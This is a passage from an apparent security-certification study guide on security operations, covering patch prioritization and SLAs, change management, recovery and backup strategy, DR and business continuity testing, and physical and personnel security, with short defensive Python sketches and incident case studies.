AI/ML tools excel at processing high volumes of data and identifying subtle patterns humans would miss. Limitations: model drift (performance degrades as environments change and models are not retrained), adversarial inputs (attackers can deliberately craft inputs to evade ML-based detection), explainability (black-box models may not be able to explain why an alert was generated — problematic for analysts who need to investigate), and false positives from legitimate anomalies during business changes (acquisitions, new system deployments).

Real-world example

Darktrace’s AI-based network detection identified an unusual pattern in a European bank’s network in 2017: a device on the internal network was beaconing to an external IP address at 3am, transferring small amounts of data at precise intervals — a pattern consistent with C2 communication but too subtle to trigger threshold-based alerts. Human analysts would not have found this in the noise of millions of daily network events. The ML model had identified the periodicity as anomalous against the device’s behavioral baseline established over weeks of observation. Investigation confirmed a banking trojan. The bank had been compromised for approximately 6 weeks before the ML detection — but the compromise was caught before credentials were used for fraud.

7.8

Implement and support patch and vulnerability management

Patch management is arguably the highest-ROI security control in operations. The majority of exploited vulnerabilities have patches available at the time of exploitation — attackers consistently exploit known, patchable vulnerabilities because they work. The challenge is not finding patches; it is applying them reliably, at scale, within the window before exploitation begins.

Patch management lifecycle

Inventory: Complete, current asset inventory is the prerequisite for patch management. You cannot patch what you have not inventoried. Every asset — physical, virtual, cloud, container — must be tracked with its software version and patch status.

Vulnerability identification: Continuous scanning (not periodic) using authenticated scan credentials to identify missing patches, misconfigurations, and known vulnerabilities. Unauthenticated scans miss 60–80% of vulnerabilities that require local access to detect.

Prioritization: Risk-based — not all patches are equal. CVSS score + exploitability + asset criticality + environment exposure = remediation priority. A critical CVSS score on an internet-facing authentication server warrants 24-hour remediation; the same score on an isolated development server warrants 14 days.

Testing and deployment: Patches tested in a non-production environment before production deployment. Change management approval for production changes. Automated deployment where possible (WSUS, SCCM, Ansible, AWS Systems Manager). Rollback plan documented before deployment begins.

Verification: Post-patch scan confirms the vulnerability is resolved. Remediation is not complete until verified — a patch that failed silently leaves the vulnerability open.
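The prioritization step can be sketched as a scoring function that combines the four inputs named above. The weights here are arbitrary assumptions chosen only to show the mechanism; an organization would calibrate its own, or use an established scheme instead.

```python
def remediation_priority(cvss, exploited_in_wild, asset_criticality, internet_facing):
    """Higher score means patch sooner. Weights are illustrative, not a standard."""
    criticality_weight = {"low": 0.0, "medium": 1.0, "high": 2.0}[asset_criticality]
    score = cvss
    score += 3.0 if exploited_in_wild else 0.0
    score += criticality_weight
    score += 2.0 if internet_facing else 0.0
    return score


findings = [
    {"asset": "dev-build-07", "cvss": 9.8, "exploited": False,
     "criticality": "low", "internet_facing": False},
    {"asset": "auth-gateway", "cvss": 9.8, "exploited": True,
     "criticality": "high", "internet_facing": True},
    {"asset": "hr-portal", "cvss": 6.5, "exploited": False,
     "criticality": "medium", "internet_facing": True},
]

ranked = sorted(
    findings,
    key=lambda f: remediation_priority(
        f["cvss"], f["exploited"], f["criticality"], f["internet_facing"]
    ),
    reverse=True,
)
print([f["asset"] for f in ranked])
```

The two assets with the same CVSS score land at different positions once exposure and criticality are taken into account, which is the point of risk-based prioritization.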

Severity | SLA target | Rationale | Real-world anchor
Critical | 24–72 hours | Actively exploited or CVSS 9.0+. Immediate risk of exploitation. | CVE-2021-44228 (Log4Shell): weaponized within hours of disclosure. Organizations patching within 24 hours largely escaped exploitation.
High | 7–14 days | Significant risk but not immediately exploited at scale. Time to test before deploying. | CVE-2017-5638 (Apache Struts / Equifax): patch available roughly two months before the breach began. SLA compliance would have prevented the breach.
Medium | 30 days | Exploitable but requires conditions or privilege not trivially available. | Most web application vulnerabilities requiring authentication fall here.
Low | 90 days | Limited direct exploitability. Often informational or requiring significant attacker assistance. | Missing security headers, outdated TLS cipher suite support.
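SLA targets like these are only useful if compliance is tracked. The sketch below computes a due date from severity using the upper bound of each range in the table; the `SLA` mapping and helper names are assumptions for illustration.

```python
from datetime import datetime, timedelta

# Upper bound of each SLA range from the table above.
SLA = {
    "critical": timedelta(hours=72),
    "high": timedelta(days=14),
    "medium": timedelta(days=30),
    "low": timedelta(days=90),
}


def remediation_due(severity, identified_at):
    """Latest acceptable remediation time for a finding of the given severity."""
    return identified_at + SLA[severity.lower()]


def is_overdue(severity, identified_at, now):
    return now > remediation_due(severity, identified_at)


found = datetime(2024, 1, 1, 9, 0)
critical_due = remediation_due("Critical", found)
high_overdue = is_overdue("High", found, now=datetime(2024, 1, 20, 9, 0))
print(critical_due, high_overdue)
```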

🌐 Real-world example — patch SLA failure

The 2021 Microsoft Exchange ProxyLogon vulnerabilities (CVE-2021-26855 et al.) were already being exploited by Chinese state actors (Hafnium) when Microsoft disclosed them and released emergency out-of-band patches on March 2, 2021. Mass exploitation by additional groups followed within days. Organizations that patched within 72 hours were largely unaffected; organizations that applied patches 2–3 weeks later often found web shells already installed, because the vulnerability had been exploited during the patching window. The incident established the principle: for critical vulnerabilities in internet-facing systems, the emergency patch SLA is hours, not days.

7.9

Understand and participate in change management processes

Change management is the governed process by which modifications to production systems are reviewed, approved, tested, documented, and tracked. Security participates in change management both as a reviewer (ensuring proposed changes don’t introduce security risk) and as a subject (ensuring security changes follow the same process as operational changes). Most production outages and many security incidents are caused by uncontrolled or inadequately tested changes.

Change Advisory Board (CAB)

The governance body that reviews and approves changes to production systems. Security must have representation on the CAB — or at minimum, a defined escalation path for changes that introduce security risk. Security review of changes is not optional for changes touching authentication, encryption, network configuration, or access control.

Change types

Standard: pre-approved low-risk changes (applying a routine patch, restarting a service). Normal: requires full CAB review and approval. Emergency: expedited process for urgent changes (security incident response, critical vulnerability patch). Emergency changes still require retrospective documentation and review.
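The three change types and the mandatory security review can be expressed as a small routing function. This is a minimal sketch under assumptions: the `ChangeRequest` fields, the tag names in `SECURITY_SENSITIVE`, and the step wording are all hypothetical, and requiring security review even for standard changes that touch sensitive areas is one possible policy reading.

```python
from dataclasses import dataclass, field

# Areas where the text says security review is not optional (tag names assumed).
SECURITY_SENSITIVE = {"authentication", "encryption", "network", "access_control"}


@dataclass
class ChangeRequest:
    summary: str
    change_type: str                       # "standard", "normal", or "emergency"
    touches: set = field(default_factory=set)


def approval_path(cr: ChangeRequest) -> list:
    """Return the ordered approval steps for a change request."""
    if cr.change_type not in {"standard", "normal", "emergency"}:
        raise ValueError(f"unknown change type: {cr.change_type}")
    steps = []
    if cr.touches & SECURITY_SENSITIVE:
        steps.append("security review")
    if cr.change_type == "standard":
        steps.append("pre-approved: implement and log")
    elif cr.change_type == "normal":
        steps.append("full CAB review and approval")
    else:
        # Emergency changes are expedited, not exempt.
        steps.append("expedited approval")
        steps.append("retrospective documentation and CAB review")
    return steps
```

For example, a normal firewall change tagged `{"network"}` would route through security review and then full CAB approval.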

Rollback planning

Every change must have a documented rollback plan — specific steps to revert the change if it causes unexpected problems. A change without a rollback plan is a gamble on success. For security changes (firewall rule modifications, authentication system changes), the rollback plan must also account for the security implications of reverting.

🌐 Real-world example — uncontrolled change

The 2024 CrowdStrike incident, in which a faulty content update caused an estimated 8.5 million Windows systems running CrowdStrike Falcon to crash with a blue screen of death, is a widely cited case study of an insufficiently controlled change. The update was pushed to production endpoints almost simultaneously, without a staged rollout, without canary testing, and without a rollback mechanism that worked remotely: once a host was crash-looping, recovery required manual intervention on that endpoint. The update triggered a logic error in the Falcon sensor, which runs in the kernel, so the fault crashed the operating system. Airlines cancelled thousands of flights; hospitals delayed procedures; banks were offline for hours. Staged rollout (deploy to 1% → monitor → 10% → 50% → 100%), canary testing, and automated rollback capability are the change management controls that would have contained the impact to a small fraction of systems.
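The staged rollout described above (1% → 10% → 50% → 100%) can be sketched as a loop that widens the deployment only while each batch stays healthy. This is an illustration, not any vendor's mechanism: `deploy`, `is_healthy`, and `rollback` are hypothetical callables supplied by the caller, and the sketch assumes rollback can still reach a host after a bad update, which is exactly the property that has to be designed in beforehand.

```python
from typing import Callable, Sequence

STAGES = (0.01, 0.10, 0.50, 1.00)  # cumulative fraction of the fleet per stage


def staged_rollout(
    hosts: Sequence[str],
    deploy: Callable[[str], None],
    is_healthy: Callable[[str], bool],
    rollback: Callable[[str], None],
    max_failure_rate: float = 0.0,
) -> bool:
    """Deploy in widening stages; roll back every updated host if a stage fails."""
    done = []
    for fraction in STAGES:
        target = max(1, round(len(hosts) * fraction))
        batch = hosts[len(done):target]      # only hosts not yet updated
        for host in batch:
            deploy(host)
        done.extend(batch)
        failures = sum(1 for host in batch if not is_healthy(host))
        if batch and failures / len(batch) > max_failure_rate:
            for host in reversed(done):      # undo newest first
                rollback(host)
            return False
    return True
```

With a fleet of 200 hosts, a fault detected in the first stage touches two machines instead of all 200. A real pipeline would also wait for a monitoring period between stages.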

7.10

Implement recovery strategies

Recovery strategy is the architectural decision about how the organization will resume operations after a disruptive event. The appropriate strategy is determined by the Business Impact Analysis (BIA) — specifically the RTO (Recovery Time Objective) and RPO (Recovery Point Objective) for each critical process. More aggressive recovery targets require more expensive infrastructure.

Recovery site strategies

Cold site

RTO: days to weeks

A facility with power, cooling, and connectivity but no pre-installed equipment. Organization brings its own servers and restores from backup. Lowest cost, longest recovery time.

Best for: non-critical systems and organizations with a very long MTD (Maximum Tolerable Downtime). Rarely suitable for primary business systems in the current threat environment.

Warm site

RTO: hours to days

Facility with pre-installed hardware and basic software, updated periodically. Requires restoration of recent backups and configuration updates before becoming operational. Moderate cost.

Suitable for: business functions with RTO of 4–72 hours. Balance between cost and recovery speed. Most common strategy for mid-sized organizations.

Hot site

RTO: minutes to hours

Fully operational duplicate of the primary site with real-time or near-real-time data replication. Can assume operations immediately on failover. Highest cost — essentially doubling infrastructure.

Required for: mission-critical systems (trading platforms, hospital clinical systems, payment processing) with RTO of minutes. Cloud-based active-active architectures have made hot site economics more accessible.

Cloud / active-active

RTO: seconds to minutes

Traffic distributed across multiple cloud regions simultaneously. No failover required — if one region fails, traffic is automatically routed to healthy regions. Recovery is instantaneous from the user’s perspective.

Modern standard for internet-facing applications. AWS, Azure, GCP multi-region deployments with Route 53 / Traffic Manager / Cloud DNS health-check-based routing achieve near-zero RTO for application availability.
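As a rough illustration of how the BIA's RTO drives the choice of strategy, the sketch below maps a required RTO to the least expensive option described above that can plausibly meet it. The 4-hour and 72-hour boundaries come from the warm site description; the 5-minute boundary between hot site and active-active is an assumption, and the function name `recovery_strategy` is hypothetical. Real decisions also weigh RPO, cost, and regulatory constraints.

```python
from datetime import timedelta


def recovery_strategy(rto: timedelta) -> str:
    """Pick the cheapest strategy whose typical recovery time fits the RTO."""
    if rto > timedelta(hours=72):
        return "cold site"              # days to weeks
    if rto >= timedelta(hours=4):
        return "warm site"              # hours to days
    if rto >= timedelta(minutes=5):     # assumed boundary, not from the text
        return "hot site"               # minutes to hours
    return "cloud / active-active"      # seconds to minutes
```

A payroll system with a one-week RTO lands on a cold site under these thresholds, while a payment API with a 30-second RTO needs active-active.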

Backup strategies

3-2-1 backup rule

3 copies of data, on 2 different media types, with 1 offsite. The classic minimum standard. Extended for ransomware: 3-2-1-1-0 — 3 copies, 2 media types, 1 offsite, 1 immutable/air-gapped, 0 errors verified by restore testing.
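The 3-2-1-1-0 rule is mechanical enough to check in code. The following is a minimal sketch assuming an inventory of data copies is available; the `BackupCopy` fields and the function name are hypothetical, and the production copy is assumed to count toward the three copies while being exempt from the restore-test check.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class BackupCopy:
    media: str                     # e.g. "disk", "tape", "object-storage"
    offsite: bool
    immutable: bool                # immutable or air-gapped
    restore_errors: Optional[int]  # None means never restore-tested
    production: bool = False       # the live copy counts toward "3 copies"


def check_3_2_1_1_0(copies: List[BackupCopy]) -> List[str]:
    """Return the parts of the 3-2-1-1-0 rule that the copy set fails."""
    failures = []
    if len(copies) < 3:
        failures.append("3 copies")
    if len({c.media for c in copies}) < 2:
        failures.append("2 media types")
    if not any(c.offsite for c in copies):
        failures.append("1 offsite")
    if not any(c.immutable for c in copies):
        failures.append("1 immutable/air-gapped")
    backups = [c for c in copies if not c.production]
    if any(c.restore_errors is None or c.restore_errors > 0 for c in backups):
        failures.append("0 errors on restore test")
    return failures
```

An empty result means the copy set satisfies every part of the rule; an untested backup fails the final "0" even if everything else is in place.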

Immutable backups

Backups that cannot be modified or deleted — not even by the administrator account. WORM (Write Once Read Many) storage, S3 Object Lock, Azure Immutable Blob Storage. Ransomware cannot encrypt what it cannot write. Immutable backups are the most effective ransomware recovery control.

Backup encryption

Backups must be encrypted, both in transit and at rest. A backup contains the same data as production, so a stolen or exposed backup is a data breach in its own right. Encryption keys must be stored separately from the backups they protect.

Restore testing

A backup that has never been successfully restored is an untested hypothesis. Restore tests must be performed on a documented schedule, with results recorded. Recovery time actually achieved in the test is compared to the RTO target. Discrepancies drive architecture improvements before an incident demands them.
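Recording restore test results in a structured form makes the comparison against RTO automatic. The sketch below is one possible shape, with hypothetical names (`RestoreTest`, `restore_findings`) and an assumed `data_verified` flag standing in for whatever integrity check the organization runs on restored data.

```python
from dataclasses import dataclass
from datetime import timedelta
from typing import List


@dataclass
class RestoreTest:
    system: str
    rto: timedelta         # target from the BIA
    achieved: timedelta    # time actually measured in the test
    data_verified: bool    # restored data passed integrity checks


def restore_findings(tests: List[RestoreTest]) -> List[str]:
    """List every discrepancy that should drive an architecture improvement."""
    findings = []
    for t in tests:
        if not t.data_verified:
            findings.append(f"{t.system}: restored data failed verification")
        if t.achieved > t.rto:
            gap = t.achieved - t.rto
            findings.append(f"{t.system}: restore exceeded RTO by {gap}")
    return findings
```

A test that restores correctly but takes six hours against a four-hour RTO is still a finding, which is the point of measuring achieved recovery time rather than just success.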

🌐 Real-world example — backup targeted by ransomware

In the 2021 Kaseya attack, the REvil ransomware group exploited Kaseya VSA, a remote management tool used by MSPs to administer customer systems, backups among them. Because VSA held administrative reach over everything it managed, ransomware delivered through it could hit production systems and any backup infrastructure on the same management plane at once. Organizations whose backup systems were managed through Kaseya and had no out-of-band immutable copies risked finding themselves with encrypted production systems and encrypted or deleted backup copies simultaneously. The attack reinforced the principle: backup infrastructure must be architecturally isolated from the systems it backs up. If ransomware can reach production, it must not be able to reach backup storage.

7.11

Implement Disaster Recovery processes

Disaster Recovery is the process of restoring IT systems and data after a disruptive event. It is the operational execution of the recovery strategy decisions made in 7.10. A recovery strategy without a documented, tested DR process is an architecture without an implementation.

Response

Immediate actions after a disaster is declared: activating the DR plan, convening the DR team, initiating communication with stakeholders, and beginning damage assessment. Response must be practiced — teams under pressure revert to training, not to documentation they’ve never read.

Personnel

DR plans must identify who does what during recovery — by role, not by individual name. Individuals may be unavailable during an actual disaster. Backups for every DR role must be identified and trained. Contact information maintained out-of-band — if the internal directory is unavailable, how do team members reach each other?

Communications

Internal communications (team coordination), external communications (customers, regulators, media), and stakeholder communications (board, investors) each require separate plans and pre-approved messaging. If primary communication systems are unavailable (email server down, Slack inaccessible), what is the out-of-band communication channel?

Restoration

Specific, step-by-step procedures for restoring each critical system in priority order. Restoration procedures must be updated whenever the underlying systems change — a procedure for restoring a system that was decommissioned 18 months ago provides no value during an incident.

7.12

Test Disaster Recovery Plans

An untested DR plan is a hypothesis. Testing validates that the plan actually works — and surfaces the gaps between the documented plan and the operational reality of executing it under pressure. DR testing exists on a spectrum from zero-disruption reviews to full production failovers.

The five test types, from least to most disruptive:

1. Read-through / tabletop
2. Walkthrough
3. Simulation
4. Parallel
5. Full interruption

Read-through / tabletop

The DR team reviews the plan document together, walking through each step and discussing whether it is still accurate and actionable. No systems are actually activated or tested. Identifies documentation gaps, outdated procedures, and role confusion. Lowest cost and risk — can be done quarterly. Does not validate whether systems actually recover in the documented timeframe.

🌐 Real-world context

Most organizations conduct tabletop exercises as their primary DR testing method — they are inexpensive and non-disruptive. The limitation: a tabletop that identifies “step 14 says restore from backup server” does not validate that the backup server is reachable, that the backups are current, or that step 14 actually takes 2 hours rather than the documented 30 minutes. Tabletops improve plan documentation but do not validate recovery capability.

Organizations that have only conducted tabletop exercises discover their actual RTO during real disasters, typically 3–5x longer than the documented RTO. Full interruption tests are the only way to know whether the RTO is achievable. Conducting at least one full interruption test per year for each critical system is the standard for mature DR programs.

7.13

Participate in Business Continuity planning and exercises

Business Continuity (BC) keeps critical business functions operating during a disruption — it is the operational layer above IT disaster recovery. BC addresses the full range of business processes, not just IT systems: how do employees work if the office is inaccessible? How do customers get service if the primary system is down? How are critical decisions made if key personnel are unavailable?

BC vs DR — the distinction

DR (Disaster Recovery) focuses on restoring IT systems after a disruption. It is a technical function — when can the database be restored, when can the application be restarted?

BC (Business Continuity) focuses on maintaining business operations during and after a disruption. It is a business function — how do we take customer orders if the order management system is down? How do we pay employees if payroll processing is interrupted? How do we operate from a different location if the office is unavailable?

Both are required. DR without BC restores IT while the business remains unable to operate. BC without DR operates manually indefinitely without a path back to normal operations. They are complementary phases of the same resilience program — BC covers the disruption period; DR covers the restoration period.

🌐 Real-world example — BC bridging the DR window

During the 2017 NotPetya attack, Maersk, the world’s largest container shipping company, had nearly all of its IT infrastructure wiped. The remarkable story is how it recovered. With no IT systems, Maersk employees fell back on manual workarounds: personal WhatsApp groups to coordinate, paper-based booking records at ports, and phone calls to track container locations. These manual procedures for core business operations were the BC component, and they kept ships moving while IT was rebuilt. The IT restoration, rebuilding 45,000 PCs and 4,000 servers in 10 days, was the DR component. The business survived because BC kept operations running during the 10-day IT recovery window. The total cost was roughly $300 million, but Maersk did not go out of business, a direct result of functional business continuity.

7.14

Implement and manage physical security

Physical security is the outermost layer of defense: it protects the infrastructure that all other security controls run on. A server room that any employee with a badge can enter undermines every logical control running on the hardware inside it. Physical security must be layered: multiple barriers requiring successive authentication events between the public perimeter and the most sensitive assets.

Perimeter controls

Fencing, bollards (vehicle barriers), security lighting, perimeter cameras, guard posts, and controlled vehicle entry points. CPTED (Crime Prevention Through Environmental Design) principles shape the physical environment to deter, detect, and delay unauthorized access. Natural barriers and clear sightlines reduce attack opportunities.

Access control vestibules (mantraps)

A double-door entry point where the first door must close and lock before the second door can open. Prevents tailgating (an unauthorized person following an authorized person through a door on a single badge swipe). The space between the two doors is under camera surveillance and may have additional authentication requirements (biometric, two-person rule for highest-security areas).
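The interlock rule for an access control vestibule is a small state machine: at most one door may be open at a time, and the inner door additionally requires authentication. The class below is a toy model under those assumptions, with hypothetical method names; real controllers also handle door sensors, timeouts, occupancy detection, and fire release.

```python
class Mantrap:
    """Two-door interlock: the doors are never open at the same time."""

    def __init__(self) -> None:
        self.outer_open = False
        self.inner_open = False

    def open_outer(self) -> bool:
        if self.inner_open:
            return False           # inner door must be closed and locked first
        self.outer_open = True
        return True

    def close_outer(self) -> None:
        self.outer_open = False

    def open_inner(self, authenticated: bool) -> bool:
        # Refuse while the outer door is open, or without a valid credential
        # presented inside the vestibule.
        if self.outer_open or not authenticated:
            return False
        self.inner_open = True
        return True

    def close_inner(self) -> None:
        self.inner_open = False
```

A person who follows someone through the outer door is stopped at the inner door, because it will not release until the outer door has closed and a credential has been checked.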

Visitor management

Visitors signed in, issued temporary credentials, escorted at all times in secure areas, and signed out with credential return. Visitor logs are evidence in security incidents — an unauthorized person in a data center during a breach investigation changes the scope and severity of the response. Unescorted visitors in secure areas are a high-risk anomaly.

Security cameras (CCTV)

Both deterrent (visible cameras deter opportunistic crime) and forensic (recorded footage supports incident investigation). Camera placement must cover all entry/exit points, high-security areas, and blind spots. Footage retention must be long enough to cover delayed-discovery incidents — 30–90 days for security areas.

🌐 Real-world example — physical breach enabling logical attack

In 2022, a security researcher demonstrated at DEF CON that they could walk into an open co-working space used by a fintech company, plug a Raspberry Pi into an open Ethernet port under a desk, and gain access to the company’s internal network, from which they could reach internal systems not accessible from the internet. The company’s perimeter logical security (firewall, WAF) provided no protection against physical network access. There was no visitor management system, no port authentication (802.1X), and no camera coverage of the network access points. Physical access to a network port is logical access to the network, and physical security must treat open network ports as the sensitive assets they are.

7.15

Address personnel safety and security concerns

Personnel are simultaneously the organization’s most critical asset and its most targeted attack surface. Personnel security addresses the human dimensions of security operations — protecting staff from threats, building their security capabilities, and ensuring they can operate safely and securely regardless of their environment.

Travel security

Employees traveling to high-risk countries face threats including device seizure at borders (customs inspection authority), hotel room compromise, public Wi-Fi interception, and physical surveillance. Mitigation: travel-specific “clean” devices with minimum data, VPN for all internet access, encrypted communications, pre-travel security briefing, and in-country emergency contacts.

Insider threat

Employees, contractors, and former staff with authorized access who misuse it — either maliciously or negligently. Detection signals: excessive data access or downloading, access outside normal hours or from unusual locations, policy violations, behavioral changes (financial stress, grievance), and access to systems unrelated to current role. UEBA and DLP are primary technical controls.
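Several of the detection signals listed above can be approximated with simple per-user baselines, which is the basic idea behind UEBA. The sketch below is a deliberately simplified illustration, not how any particular product works: the function names, the three-sigma threshold, the 07:00 to 19:00 working window, and the 1 MB floor on the spread are all assumptions.

```python
from statistics import mean, stdev


def excessive_download(history_mb, today_mb, sigmas=3.0):
    """True if today's volume exceeds the user's own baseline by `sigmas`."""
    if len(history_mb) < 2:
        return False  # too little history to form a baseline
    baseline, spread = mean(history_mb), stdev(history_mb)
    # Floor the spread so a perfectly flat history does not flag tiny increases.
    return today_mb > baseline + sigmas * max(spread, 1.0)


def insider_signals(history_mb, today_mb, login_hour, accessed, role_systems,
                    work_hours=range(7, 19)):
    """Return which detection signals this day's activity trips."""
    signals = []
    if excessive_download(history_mb, today_mb):
        signals.append("excessive download volume")
    if login_hour not in work_hours:
        signals.append("access outside normal hours")
    unrelated = set(accessed) - set(role_systems)
    if unrelated:
        signals.append("access unrelated to role: " + ", ".join(sorted(unrelated)))
    return signals
```

No single signal proves misuse; the value comes from correlating several of them for the same account and routing the result to a human analyst.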

MFA / 2FA fatigue

Social engineering technique where attackers send repeated MFA push notifications until the fatigued user approves one. Training must address: how to recognize fatigue attacks, to never approve an unexpected MFA push, to immediately report unexpected MFA notifications, and how to use number matching and additional context features that defeat fatigue attacks.
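On the detection side, push bombing shows up as a burst of unapproved push requests for one account. The sliding-window counter below is a minimal sketch of that idea; the class name, the threshold of three pushes, and the ten-minute window are assumptions, and it presumes the identity provider exposes an event for each denied or ignored push.

```python
from collections import deque
from datetime import datetime, timedelta


class PushFatigueDetector:
    """Flag accounts that receive too many unapproved pushes in a short window."""

    def __init__(self, max_pushes: int = 3,
                 window: timedelta = timedelta(minutes=10)) -> None:
        self.max_pushes = max_pushes
        self.window = window
        self._recent = {}  # user -> deque of timestamps

    def record_push(self, user: str, at: datetime) -> bool:
        """Record a denied or ignored push; return True if it looks like an attack."""
        q = self._recent.setdefault(user, deque())
        q.append(at)
        # Drop timestamps that have aged out of the window.
        while q and at - q[0] > self.window:
            q.popleft()
        return len(q) > self.max_pushes
```

A positive result could lock further pushes for the account and alert the SOC, so that the user never reaches the point of approving one out of fatigue.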

Emergency management

Personnel safety protocols for physical emergencies: fire evacuation, active threat response, medical emergencies. Human life always takes precedence over protecting assets or data. Security operations must integrate with physical safety: an active shooter scenario may call for immediate lockdown of physical access systems, while a fire evacuation requires doors that release for egress. Any procedure for securing or removing laptops in sensitive data environments must never delay evacuation.

Duress procedures

A duress code or duress PIN allows a person being coerced (forced at gunpoint to unlock a system or grant physical access) to signal silently that they are under duress — triggering a security response while appearing to comply. Duress codes must be trained, maintained, and tested — an untrained employee under duress cannot improvise.

🌐 Real-world example — travel security

In 2018, a senior executive at a US aerospace company traveled to China for business negotiations. Chinese customs officials required the executive to unlock their laptop and phone at the border — a legal requirement that companies must prepare for. Analysis later found the devices had been cloned. The data exfiltrated included not just the executive’s files but the VPN configuration, cached credentials, and email content — which provided access to the company’s internal network after the executive returned. The company had no travel security program, no clean travel devices, and had not briefed the executive on border crossing risks. Organizations operating in jurisdictions with mandatory device inspection must treat all returning travel devices as potentially compromised and require re-enrollment before network access.

Security awareness is not a training event — it is an ongoing culture. One annual CBT course does not change behavior. Monthly simulations, short-form communications, security champions who reinforce messages in team contexts, and a culture where reporting suspected security issues is rewarded (not punished) are the elements of a program that actually reduces human-layer risk over time.

The security operations chain

Every gap in this chain is where an attacker persists longer, moves further, causes more damage, or recovers faster than the organization does.

1

Collect evidence properly before you need it

Chain of custody, order of volatility, forensic imaging. Evidence collected incorrectly before a crisis cannot be fixed after it.

Gap: inadmissible evidence

2

Log everything relevant, monitor it continuously

SIEM with complete log coverage, tuned detection rules, UEBA for behavioral anomalies, threat hunting for what rules miss. Visibility is the prerequisite for detection.

Gap: blind spots in logging

3

Maintain known-good configurations

Baselines, drift detection, IaC for automated consistent deployment. Most breaches begin with a misconfiguration, not a zero-day.

Gap: configuration drift

4

Respond to incidents with a practiced plan

Detect → Respond → Mitigate → Report → Recover → Remediate → Learn. Each phase has defined outputs. Lessons learned must drive action items.

Gap: no IR plan

5

Patch vulnerabilities within risk-based SLAs

Complete asset inventory, continuous scanning, risk-based prioritization, verified remediation. Most exploited vulnerabilities have patches available — apply them.

Gap: patch SLA unmet

6

Control every change to production

CAB review, security sign-off, staged rollout, rollback plan. Most outages and many breaches are caused by uncontrolled changes.

Gap: unauthorized changes

7

Test recovery before you need it

3-2-1-1-0 backups, immutable copies, verified restore tests. Recovery sites tested at the interruption level. Tabletops alone are not enough.

Gap: untested recovery

8

Protect people as well as systems

Travel security, insider threat programs, MFA fatigue training, duress procedures, emergency management. People are the ultimate target of every attack.

Gap: humans as weakest link
